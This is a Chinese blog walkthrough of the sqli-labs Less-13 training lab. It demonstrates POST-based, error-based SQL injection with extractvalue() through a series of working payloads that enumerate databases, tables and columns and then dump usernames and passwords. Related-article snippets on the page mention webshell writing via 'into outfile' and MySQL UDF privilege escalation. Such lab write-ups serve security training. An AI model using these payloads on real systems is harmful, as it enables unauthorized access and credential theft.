sqli-labs less-13 post报错注入使用extractvalue

最新推荐文章于 2024-11-09 21:51:58 发布
最新推荐文章于 2024-11-09 21:51:58 发布
阅读量998 收藏 20
点赞数 26
分类专栏: sqli-labs靶场 文章标签: less 数据库 mybatis sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wanggonghanfei/article/details/142740652
版权

post提交报错注入

在这里插入图片描述

闭合方式及注入点

利用hackbar进行注入,构造post语句

uname=aaa’passwd=bbb&Submit=Submit
页面报错,根据分析,闭合方式').

确定列数

构造

uname=aaa’) or 1=1 # &passwd=bbb&Submit=Submit 确定存在注入

uname=aaa’) order by 3 # &passwd=bbb&Submit=Submit 有报错
uname=aaa’) order by 2 # &passwd=bbb&Submit=Submit 无报错,列数2

回显位置

uname=aaa’) union select 1,2 # &passwd=bbb&Submit=Submit
发现页面没有回显,想到前面 存在报错,想到报错注入

使用extractvalue()函数来进行报错注入

查询数据库与版本等

  • uname=aaa’) union select 1,extractvalue(1,concat(‘~’,(select database()))) # &passwd=bbb&Submit=Submit
    数据库名
  • uname=aaa’) union select 1,extractvalue(1,concat(‘~’,(select version()))) # &passwd=bbb&Submit=Submit
    版本

爆出所有数据库

  • uname=aaa’) union select 1,extractvalue(1,concat(‘~’,(select schema_name from information_schema.schemata limit 0,1))) # &passwd=bbb&Submit=Submit
  • uname=aaa’) union select 1,extractvalue(1,concat(‘~’,(select schema_name from information_schema.schemata limit 5,1))) # &passwd=bbb&Submit=Submit
    通过修改limit函数的值来查询所有的数据库名

爆出所有表名

  • uname=aaa’) union select 1,extractvalue(1,concat(‘~’,(select table_name from information_schema.tables where table_schema=database() limit 0,1))) # &passwd=bbb&Submit=Submit
  • uname=aaa’) union select 1,extractvalue(1,concat(‘~’,(select table_name from information_schema.tables where table_schema=database() limit 1,1))) # &passwd=bbb&Submit=Submit
  • uname=aaa’) union select 1,extractvalue(1,concat(‘~’,(select table_name from information_schema.tables where table_schema=database() limit 2,1))) # &passwd=bbb&Submit=Submit
  • uname=aaa’) union select 1,extractvalue(1,concat(‘~’,(select table_name from information_schema.tables where table_schema=database() limit 3,1))) # &passwd=bbb&Submit=Submit
    得到users

爆出列名

  • uname=aaa’) union select 1,extractvalue(1,concat(‘~’,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1))) # &passwd=bbb&Submit=Submit
  • uname=aaa’) union select 1,extractvalue(1,concat(‘~’,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 1,1))) # &passwd=bbb&Submit=Submit
  • uname=aaa’) union select 1,extractvalue(1,concat(‘~’,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 2,1))) # &passwd=bbb&Submit=Submit
    得到列id,username,password

爆出数据

  • uname=aaa’) union select 1,extractvalue(1,concat(‘~’,(select concat(username,‘:’,password) from security.users limit 0,1))) # &passwd=bbb&Submit=Submit
    修改0的值,就可以得到所有的数据

完成,
还可与尝试updatexml()报错注入,floor()报错注入等,页面报错回显除了limit 0,1 之外,还可以使用substring()函数

Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1546
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
git项目太大拉取失败报错error: RPC failed; curl 92 HTTP/2 stream 7 was not closed cleanly: CANCEL (e...
chengjiayijiu的博客
10-08 299
最后拉取所有其他远程分支,在idea中通过file->Open选择该项目文件就可以查看到代码和所有远程分支存在。git里面提交的文件数目多文件大的时候直接在idea里连接git地址克隆报错。数值调大(ps:我先试了这个还是报错,用的方法一成功)拉取成功后进入项目文件夹下执行如下拉取完整当前分支。可以先在本地拉取最后一次提交后的代码。
sqli-labs less-14post报错注入updatexml
wanggonghanfei的博客
10-07 1345
利用hackbar进行注入,构造post语句页面报错,根据分析,闭合方式。
sqli-labs less-16 post提交dnslog注入
wanggonghanfei的博客
10-07 1107
sqli-labs less-16 post提交dnslog注入
Sqli-labs Less32-Less33 宽字节注入
beiweixiaotian66的博客
07-25 707
一丢丢Sqli-labs小练习
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 16万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli注入详解——>sqli-labs less-1~65
qq_51780583的博客
03-18 1191
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。服务器端有两个部分:第一部分为tomcat为引擎的jsp型服务器,第二部分为apache为引擎的php服务器,真正提供web服务器的是php服务器。工作流程为:client访问服务器能直接访问到tomcat服务器,然后tomcat服务器再向apache服务器请求数据。
sqli-labs less-12 post注入
wanggonghanfei的博客
10-07 763
使用post注入通过sqli-labs十二关,使用hackbar插件
SQLi LABS Less-13 报错注入+布尔盲注
wangyuxiang946的博客
06-21 1万+
SQLi 第十三关,SQLi-LABS Less-13SQLi-LABS Less 13SQLiLABS Less13SQLi Less 13
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 831
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
Sqli-labs靶场第18关详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1326
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
如何使用 Puppeteer 和 Browserless 抓取亚马逊产品数据?
wellshake的博客
11-08 885
您可以在亚马逊上找到所有有关产品、卖家、评论、评分、特价、新闻等的相关且有价值的信息。无论是卖家进行市场调研还是个人收集数据,使用高质量、便捷且快速的工具将极大地帮助您准确地抓取亚马逊上的各种信息。
07 Oracle数据库恢复基础解析:从检查点到归档,一步步构建数据安全防线
最新发布
超哥的博客
11-09 786
检查点是Oracle数据库中的一个特殊事件,它的作用是将内存中的数据块同步到磁盘上,以确保数据的持久性。简单来说,就是让数据库“记住”到目前为止所有的更改。Redo日志是Oracle用来记录所有数据更改的日志文件。每次对数据库进行修改时,都会先写入Redo日志,然后再写入数据文件。这样,即使系统崩溃,也能通过Redo日志恢复数据。当数据库运行在归档模式下时,一旦当前的Redo日志文件满,Oracle会将其复制到一个安全的存储位置,并标记为已归档。这样可以长期保留Redo日志,便于历史数据的恢复。
Redis - 事务
ketil27的博客
11-08 568
Redis 的事务和MySQL的事务概念上是类似的.都是把⼀系列操作绑定成⼀组.让这⼀组能够批量执 ⾏.弱化的原⼦性:redis没有"回滚机制".只能做到这些操作"批量执⾏".不能做到"⼀个失败就恢复到 初始状态".不保证⼀致性:不涉及"约束". 也没有回滚.MySQL的⼀致性体现的是运⾏事务前和运⾏后,结果都 是合理有效的,不会出现中间⾮法状态.不需要隔离性:也没有隔离级别,因为不会并发执⾏事务(redis单线程处理请求).
Mysql数据库的UDF提权
CoffeMilk的博客
11-05 1404
渗透人员编写可调用系统命令行(CMD或shell)的文件生成动态链接库(Windows系统是.dll;Linux系统是.so),且将该动态链接库内容上传到MySql的函数插件文件夹目录下;然后在通过sql语句调用该动态链接库创建一个自定义函数,最后直接调用该自定义函数sql执行查询系统命令,实现提权(即:在数据库中的查询就等价于直接在系统调用cmd或者shell中执行命令)
windows11安装redis
qq_42985657的博客
11-06 396
下载免安装版本,鼠标点击一下自动下载。解压。
PHP与Apache环境下部署SQL注入靶场sqli-labs指南
部署sqli-labs是一个实战训练过程,它不仅提供了丰富的SQL注入实例,还能帮助开发者熟悉如何防范此类攻击,是提升网络安全技能的实用工具。通过这个靶场,你将更深入理解Web应用程序安全的重要性,并掌握如何在实际...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值